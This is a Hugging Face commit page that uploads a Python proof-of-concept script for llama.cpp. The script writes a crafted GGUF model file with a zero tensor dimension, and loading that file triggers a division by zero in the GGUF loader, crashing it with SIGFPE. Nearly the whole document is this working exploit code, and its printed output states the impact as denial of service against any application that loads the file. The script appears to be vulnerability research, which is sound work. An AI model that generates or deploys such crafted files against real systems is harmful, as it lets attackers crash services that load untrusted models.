Zeiyre commited on
Commit
526abd8
·
verified ·
1 Parent(s): 2b77856

Upload llama-cpp/craft_divzero_gguf.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. llama-cpp/craft_divzero_gguf.py +93 -0
llama-cpp/craft_divzero_gguf.py ADDED
@@ -0,0 +1,93 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ PoC GGUF Generator -- Division by Zero in Tensor Validation
3
+ =============================================================
4
+ Crafts a GGUF file with a zero-valued dimension that triggers
5
+ INT64_MAX / 0 in gguf_init_from_file_impl()'s overflow check.
6
+
7
+ The code validates ne[j] < 0 (rejects negative) but NOT ne[j] == 0.
8
+ With n_dims >= 2 and ne[1] = 0: INT64_MAX / ne[1] = INT64_MAX / 0 -> SIGFPE.
9
+
10
+ Usage:
11
+ python craft_divzero_gguf.py # Generate divzero.gguf
12
+ python craft_divzero_gguf.py -o custom.gguf
13
+
14
+ Then test:
15
+ ./llama-gguf-hash divzero.gguf
16
+ # Expected: Floating point exception (SIGFPE) / crash
17
+ """
18
+
19
+ import argparse
20
+ import struct
21
+
22
+ GGUF_MAGIC = 0x46554747
23
+ GGUF_VERSION = 3
24
+ GGUF_DEFAULT_ALIGNMENT = 32
25
+ GGUF_TYPE_STRING = 8
26
+ GGML_TYPE_F32 = 0
27
+
28
+
29
+ def write_gguf_string(f, s):
30
+ encoded = s.encode("utf-8")
31
+ f.write(struct.pack("<Q", len(encoded)))
32
+ f.write(encoded)
33
+
34
+
35
+ def write_kv_string(f, key, value):
36
+ write_gguf_string(f, key)
37
+ f.write(struct.pack("<I", GGUF_TYPE_STRING))
38
+ write_gguf_string(f, value)
39
+
40
+
41
+ def pad_to_alignment(f, alignment):
42
+ pos = f.tell()
43
+ remainder = pos % alignment
44
+ if remainder != 0:
45
+ f.write(b"\x00" * (alignment - remainder))
46
+
47
+
48
+ def main():
49
+ parser = argparse.ArgumentParser(description="Craft GGUF with division-by-zero PoC")
50
+ parser.add_argument("-o", "--output", default="divzero.gguf", help="Output filename")
51
+ args = parser.parse_args()
52
+
53
+ print("Crafting GGUF with zero dimension to trigger INT64_MAX / 0...")
54
+ print(" n_dims = 2, ne[0] = 1, ne[1] = 0")
55
+ print(" Overflow check: INT64_MAX / ne[1] = INT64_MAX / 0 -> SIGFPE")
56
+ print()
57
+
58
+ with open(args.output, "wb") as f:
59
+ # Header
60
+ f.write(struct.pack("<I", GGUF_MAGIC))
61
+ f.write(struct.pack("<I", GGUF_VERSION))
62
+ f.write(struct.pack("<Q", 1)) # n_tensors = 1
63
+ f.write(struct.pack("<Q", 1)) # n_kv = 1
64
+
65
+ # Metadata: general.architecture (required)
66
+ write_kv_string(f, "general.architecture", "llama")
67
+
68
+ # Tensor info
69
+ write_gguf_string(f, "divzero_tensor")
70
+ f.write(struct.pack("<I", 2)) # n_dims = 2
71
+ f.write(struct.pack("<Q", 1)) # ne[0] = 1
72
+ f.write(struct.pack("<Q", 0)) # ne[1] = 0 <-- TRIGGERS DIV BY ZERO
73
+ f.write(struct.pack("<I", GGML_TYPE_F32)) # type = F32
74
+ f.write(struct.pack("<Q", 0)) # offset = 0
75
+
76
+ # Pad to alignment
77
+ pad_to_alignment(f, GGUF_DEFAULT_ALIGNMENT)
78
+
79
+ # Minimal tensor data
80
+ f.write(b"\x00" * 32)
81
+
82
+ print(f"Written: {args.output}")
83
+ print()
84
+ print("Test with:")
85
+ print(f" ./llama-gguf-hash {args.output}")
86
+ print(" # Expected: 'Floating point exception' (SIGFPE) or crash")
87
+ print()
88
+ print("Impact: Any application using gguf_init_from_file() to load this")
89
+ print("file will crash. Denial of Service via crafted model file.")
90
+
91
+
92
+ if __name__ == "__main__":
93
+ main()